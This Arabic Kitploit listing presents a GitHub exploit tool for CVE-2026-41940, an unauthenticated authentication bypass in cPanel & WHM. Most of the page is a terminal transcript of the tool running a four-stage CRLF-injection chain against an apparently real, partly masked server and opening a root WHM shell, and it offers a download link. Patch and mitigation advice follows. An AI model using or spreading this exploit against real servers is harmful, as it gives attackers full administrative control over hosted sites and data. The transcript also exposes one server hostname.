Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-41940 — CVE-2026-41940 | Kitploit
أدوات/GitHubGitHub/0xblackash/cve-2026-41940
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHub0xblackash/cve-2026-41940

CVE-2026-41940

CVE-2026-41940

عرض المستودع
14منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

⚠️ CVE-2026-41940 - تجاوز المصادقة في cPanel & WHM

ChatGPT Image May 1, 2026, 08_27_37 PM
CVSS 9.8 Critical Actively Exploited

ثغرة حرجة لتجاوز المصادقة قبل تسجيل الدخول في cPanel & WHM


📌 نظرة عامة

CVE-2026-41940 هي ثغرة حرجة لتجاوز المصادقة تؤثر على cPanel & WHM و WP Squared.

يمكن لمهاجم بعيد غير مصادق تجاوز تسجيل الدخول بالكامل والحصول على وصول إداري كامل (جذر/WHM) إلى الخادم.

تم استغلال الثغرة بنشاط في البرية قبل إصدار التصحيح.


🎯 درجة الخطورة


🛠️ المنتجات المتأثرة

  • cPanel & WHM — جميع الإصدارات بعد 11.40 حتى إصدار التصحيح
  • WP Squared — الإصدارات الأقدم من 136.1.7

تعرّضت حوالي 1.5 مليون نسخة من cPanel للخطر المحتمل وقت الإفصاح عن الثغرة.


🔥 الأثر

الاستغلال الناجح يسمح للمهاجمين بـ:

  • الحصول على وصول كامل إلى WHM/الجذر
  • السيطرة على جميع المواقع والحسابات المستضافة
  • تعديل تكوينات الخادم
  • تسريب البيانات الحساسة
  • نشر أبواب خلفية دائمة

✅ إليك كيف يبدو النجاح (مثل لقطة شاشة Eye Security التي عرضتَها):

يجب أن ترى شيئًا كهذا إذا نجحت العملية:

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2026-41940.py -u https://xx.xx.xx.xx:2087 --action shell                      
[sudo] password for kali: 


 ██████╗ ██╗  ██╗██████╗ ██╗      █████╗  ██████╗██╗  ██╗ █████╗ ███████╗██╗  ██╗
██╔═████╗╚██╗██╔╝██╔══██╗██║     ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║  ██║
██║██╔██║ ╚███╔╝ ██████╔╝██║     ███████║██║     █████╔╝ ███████║███████╗███████║
████╔╝██║ ██╔██╗ ██╔══██╗██║     ██╔══██║██║     ██╔═██╗ ██╔══██║╚════██║██╔══██║
╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║  ██║╚██████╗██║  ██╗██║  ██║███████║██║  ██║
 ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝
  CVE-2026-41940 — cPanel & WHM Auth Bypass via CRLF Injection
  4-stage: preauth → CRLF inject → propagate → verify → post-exploit
  Author : Ashraf Zaryouh / @0xBlackash

  Configuration:
   Targets  : 1
   Threads  : 10
   Timeout  : 15s
   Action   : shell

13:41:18 [SCAN] Starting 4-stage exploit chain... https://xx.xx.xx.xx:2087
13:41:19 [INFO] Canonical hostname discovered: server.xxxxxxx.xx
13:41:19 [INFO] Canonical: server.softsms.in
13:41:19 [STEP] Stage 1/4 — Minting preauth session...
13:41:20 [  OK] Stage1: preauth session = :W43DhFApxxxD8Jdw...
13:41:20 [STEP] Stage 2/4 — CRLF injection via Authorization header...
13:41:21 [  OK] Stage2: HTTP 307 → token=/cpsess263xxxx267
13:41:21 [STEP] Stage 3/4 — Firing do_token_denied gadget (raw→cache)...
13:41:22 [  OK] Stage3: HTTP 401 — do_token_denied gadget fired
13:41:22 [STEP] Stage 4/4 — Verifying WHM root access...
13:41:24 [INFO] Stage4: HTTP 200  {"version":"11.86.0.40"}
13:41:24 [PWND] CVE-2026-41940 CONFIRMED — WHM root access!  https://xx.xx.xx.xx:2087
13:41:24 [PWND]   Token    : /cpsess2634xxxx267
13:41:24 [PWND]   Session  : :W43DhFApxxxD8Jdw...
13:41:24 [PWND]   Version  : 11.86.0.40
13:41:24 [PWND]   API URL  : https://xx.xx.xx.xx:2087/cpsess2634xxxx267/json-api/version
13:41:24 [ API] Running post-exploit action: shell

════════════════════════════════════════════════════════════
  WHM Shell — server.xxxxxxx.xx
  Version: CVE-2026-41940 | Auth: CRLF bypass
  Type 'help' for commands, 'exit' to quit
════════════════════════════════════════════════════════════

[email protected] ▶ id
13:41:28 [ API] gethostname → HTTP 500
  uid=0(root) gid=0(root) groups=0(root)
[email protected] ▶ exit
Exiting shell.

══════════════════════════════════════════════════════════════════════
  CVE-2026-41940.py — CVE-2026-41940 Scan Complete
  Time: 13.9s  ·  Targets: 1
──────────────────────────────────────────────────────────────────────

  ⚡ 1 VULNERABLE TARGET(S)

  Target   : https://xx.xx.xx.xx:2087
  Version  : 11.86.0.40
  Token    : /cpsess263xxxx267
  API URL  : https://xx.xx.xx.xx:2087/cpsess2634xxxx267/json-api/version
  Session  : :W43DhFApxxxD8Jdw...
  Evidence : {"version":"11.86.0.40"}

══════════════════════════════════════════════════════════════════════


✅ الإصدارات المُصحَّحة

تم إصدار التصحيح في 28 أبريل 2026

  • قم بتحديث cPanel & WHM إلى أحدث إصدار
  • قم بتحديث WP Squared إلى الإصدار 136.1.7 أو أحدث

يُنصح باتخاذ إجراء فوري


🛡️ التخفيف والحماية

  • قم بالتحديث فورًا إلى أحدث إصدار
  • امنع الوصول العام إلى المنافذ 2082، 2083، 2086، 2087
  • فعّل قواعد WAF (Cloudflare, ModSecurity، إلخ.)
  • استخدم قوائم السماح بعناوين IP أو VPN للوصول الإداري

📚 المراجع

  • NVD - CVE-2026-41940
  • watchTowr Labs - تحليل فني معمّق
  • نشرة الأمان الرسمية من cPanel
  • كتالوج CISA KEV


صُنع بـ ❤️ لمجتمع الأمن

آخر تحديث: مايو 2026

تنزيل الأداة
المقياسالقيمة
درجة CVSS 3.19.8 (حرجة)
درجة CVSS 4.09.3 (حرجة)
متجه الهجومالشبكة
التعقيدمنخفض
الامتيازاتلا شيء
تفاعل المستخدملا شيء